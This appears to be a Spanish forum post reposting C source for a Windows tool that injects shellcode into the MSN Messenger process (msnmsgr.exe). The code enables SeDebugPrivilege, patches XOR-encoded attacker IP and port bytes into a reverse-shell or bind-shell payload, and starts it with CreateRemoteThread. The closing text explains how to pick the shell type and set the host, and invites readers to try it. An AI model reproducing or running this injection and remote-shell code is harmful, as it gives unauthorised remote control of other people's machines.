p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
c =(struct Data *) VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( c == 0 )
goto cleanup;
// copy the function's bytes into the reserved region
// NOTE(review): MAXINJECTSIZE (4096) bytes are copied from the function's address
// rather than its real length, so this reads past the function; the RData copy
// below likewise reads past the struct, which is far smaller than 4096 bytes.
if ( ! WriteProcessMemory( hProcess, p, &RemoteGetHostByName, MAXINJECTSIZE, 0 ) )
goto cleanup;
// copy the parameter block into the reserved region
if ( ! WriteProcessMemory( hProcess, c, &RData, MAXINJECTSIZE, 0 ) )
goto cleanup;
// run the copied function remotely, with the remote Data block as its argument
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, c, 0, &rc );
if ( ht == NULL )
goto cleanup;
// Blocks until the remote thread exits. Neither this result nor the ReadProcessMemory
// result is checked, so Sin is assigned (and 1 returned) even if the read-back failed.
rc = WaitForSingleObject( ht, INFINITE );
ReadProcessMemory(hProcess,c,&RData,sizeof(struct Data),0);
Sin = RData.Sin;
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 0;
}
// Copies the RShell payload into a freshly allocated PAGE_EXECUTE_READWRITE region
// of hProcess and starts a remote thread at its first byte, with no argument.
// Returns 1 as soon as the thread has been created, 0 if the allocation, the write
// or the thread creation fails (the region is released on that path only).
// NOTE(review): on success ht is never closed and the region is never freed — the
// latter presumably deliberate since the new thread executes from it; the cleanup
// label closes ht while it may still be 0. As in ResolucionIpInjection(),
// MAXINJECTSIZE bytes are copied although RShell is much shorter, so the write
// reads past the array. The post text after the listing says to pass &DShell
// instead of &RShell to select the other payload.
bool ShellInjection( HANDLE hProcess)
{
HANDLE ht = 0;
void *p = 0;
DWORD rc; // receives the remote thread id; never read
// reserve memory in the remote process
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
// copy the payload into the reserved region
if ( ! WriteProcessMemory( hProcess, p, &RShell, MAXINJECTSIZE, 0 ) )
goto cleanup;
// run the copied bytes remotely
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, NULL, 0, &rc );
if ( ht == NULL )
goto cleanup;
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
return 0;
}
// Reports whether the running OS belongs to the Windows NT family. Queries
// GetVersionEx with the OSVERSIONINFOEX layout first and retries with the plain
// OSVERSIONINFO layout if that is rejected; returns FALSE when both calls fail.
BOOL IsWindowsNT()
{
OSVERSIONINFOEX osvi;
BOOL bOsVersionInfoEx;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi);
if( bOsVersionInfoEx == 0 )
{
// Fall back to the smaller structure; only the common prefix is needed below.
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return FALSE;
}
return osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
}
// Tries to enable SeDebugPrivilege on the current process token. Failures are
// reported with wprintf and otherwise ignored; there is no return value, so the
// caller (WinMain) cannot tell whether the privilege is actually held.
// NOTE(review): GetLastError() returns a DWORD, so %d is a mismatched format for it.
// A nonzero AdjustTokenPrivileges return also does not mean the privilege was
// granted: the documented check is GetLastError() == ERROR_SUCCESS afterwards
// (ERROR_NOT_ALL_ASSIGNED means the token does not hold the privilege).
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
wprintf( L"OpenProcessToken() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
return;
}
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
wprintf( L"LookupPrivilegeValue() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
return;
}
// Single-entry privilege array: enable the LUID looked up above.
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
wprintf( L"AdjustTokenPrivileges() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
}
// Returns byte XOR 0x92. SetShell() passes every address and port byte it patches
// into RShell through this before storing it.
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
// Patches both payload arrays in place before injection: resolves Host (through the
// target process) and writes the xor_data()-encoded address octets and port bytes
// into fixed RShell offsets, and writes Port big-endian into DShell[174..175].
// NOTE(review): the ResolucionIpInjection() result is ignored, so on failure Sin is
// read uninitialised. ip_addr, i, j, port and encoded_ip are never read; the strncpy
// into ip_addr is dead code (and with a 20-byte limit would not NUL-terminate anyway).
void SetShell(HANDLE hProcess)
{
char ip_addr[256];
unsigned long encoded_port = 0;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 63000;
unsigned long encoded_ip = 0;
struct sockaddr_in Sin;
// host name -> IP resolution
ResolucionIpInjection(hProcess,Sin);
// reverse-shell port initialisation
strncpy(ip_addr, Host, 20);
// On a little-endian host, htonl() of the 16-bit Port leaves its two bytes in the
// upper half of the value, which the >>16 and >>24 extractions below pick out.
// The purpose of the +2 is not evident from this file.
encoded_port = htonl(Port);
encoded_port += 2;
RShell[184] = (char) 0x90;
RShell[185] = (char) 0x92;
RShell[186] = xor_data((char)((encoded_port >> 16) & 0xff));
RShell[187] = xor_data((char)((encoded_port >> 24) & 0xff));
// reverse-shell IP initialisation: one octet per byte, each encoded with xor_data()
raw_num = Sin.sin_addr.S_un.S_un_b.s_b1;
RShell[179] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b2;
RShell[180] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b3;
RShell[181] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b4;
RShell[182] = xor_data((char)raw_num);
// direct-shell port initialisation: high byte, then low byte
DShell[174] = (0xFF00 & Port) >> 8;
DShell[175] = 0x00FF & Port;
}
// Entry point. Looks up the PID of "msnmsgr.exe", bails out on non-NT Windows,
// attempts to enable SeDebugPrivilege, opens the target with the thread-creation and
// memory access rights the injection routines use, then patches the payload
// (SetShell) and injects it (ShellInjection). Returns 1 if the target could be
// opened, 0 otherwise.
// NOTE(review): a 0 from GetProcessId (target not running) is passed straight to
// OpenProcess rather than rejected, the snapshot is taken before the OS check, and
// the ShellInjection result is ignored. hInstance, hPrevInstance, lpCmdLine and
// nCmdShow are unused.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HANDLE hProcess;
int Pid = GetProcessId("msnmsgr.exe");
if ( !IsWindowsNT())
return 0;
EnableDebugPriv();
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, Pid);
if ( hProcess != NULL )
{
SetShell(hProcess);
ShellInjection( hProcess);
CloseHandle( hProcess );
}
else
return 0;
return 1;
}
El programa puede ser una shell directa o inversa, debiéndose editar esta línea:
Shell Directa:
if ( ! WriteProcessMemory( hProcess, p, &DShell, MAXINJECTSIZE, 0 ) )goto cleanup;
Shell reversa:
if ( ! WriteProcessMemory( hProcess, p, &RShell, MAXINJECTSIZE, 0 ) )goto cleanup;
El puerto y la IP se editan en las variables; en IP se podría colocar un host y él hace la resolución a IP, "muy útil para los que tienen IP dinámica":
unsigned int Port = 63000;
char *Host = "localhost";
Fuente: cyruxNET
Ahora bien, al intentar compilarlo con Visual Studio 6.0 C++ me da error en la librería 'stdafx.h'. Busqué en la web y me aparecen varias distintas. ¿Qué debo hacer? Si alguien desea probar el programilla y postear avances, bienvenido sea.
Salu2









